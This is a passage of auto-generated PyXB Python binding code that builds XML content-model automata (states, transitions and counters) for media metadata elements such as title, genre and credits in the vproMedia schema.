fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_17, False) ]))
st_19._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_18, True) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_18, False) ]))
st_20._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_19, True) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_19, False) ]))
st_21._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_20, True) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_20, False) ]))
st_22._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_21, True) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_21, False) ]))
st_23._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_22, True) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_22, False) ]))
st_24._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_23, True) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_23, False) ]))
st_25._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_24, True) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_24, False) ]))
st_26._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_25, True) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_25, False) ]))
st_27._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_26, True) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_26, False) ]))
st_28._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_27, True) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_27, False) ]))
st_29._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_28, True) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_28, False) ]))
st_30._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_29, True) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_29, False) ]))
st_31._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_30, True) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_30, False) ]))
st_32._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_31, True) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_31, False) ]))
st_33._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_32, True) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_32, False) ]))
st_34._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_33, True) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_33, False) ]))
st_35._set_transitionSet(transitions)
transitions = []
st_36._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
segmentType._Automaton = _BuildAutomaton_29()
groupType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'poSeriesID'), pyxb.binding.datatypes.string, scope=groupType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 841, 10)))
def _BuildAutomaton_30 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_30
del _BuildAutomaton_30
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
counters.add(cc_13)
cc_14 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
counters.add(cc_14)
cc_15 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
counters.add(cc_15)
cc_16 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
counters.add(cc_16)
cc_17 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
counters.add(cc_17)
cc_18 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
counters.add(cc_18)
cc_19 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
counters.add(cc_19)
cc_20 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
counters.add(cc_20)
cc_21 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
counters.add(cc_21)
cc_22 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
counters.add(cc_22)
cc_23 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
counters.add(cc_23)
cc_24 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
counters.add(cc_24)
cc_25 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
counters.add(cc_25)
cc_26 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
counters.add(cc_26)
cc_27 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
counters.add(cc_27)
cc_28 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
counters.add(cc_28)
cc_29 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
counters.add(cc_29)
cc_30 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
counters.add(cc_30)
cc_31 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
counters.add(cc_31)
cc_32 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
counters.add(cc_32)
cc_33 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 841, 10))
counters.add(cc_33)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'crid')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'broadcaster')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 237, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'portal')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'exclusive')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'region')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'title')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 269, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'description')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'genre')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'tag')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'intentions')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_8, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'targetGroups')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'geoLocations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'topics')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_11, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'source')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_12, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'country')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_13, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'language')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_14, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isDubbed')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
st_16 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_16)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_15, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'availableSubtitles')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
st_17 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_17)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_16, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
st_18 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_18)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_17, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'releaseYear')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
st_19 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_19)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_18, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'duration')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
st_20 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_20)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_19, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'credits')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
st_21 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_21)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_20, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'award')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
st_22 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_22)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_21, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'descendantOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
st_23 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_23)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_22, False))
symbol = pyxb.binding.content.ElementUse(groupType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
st_24 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_24)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_23, False))
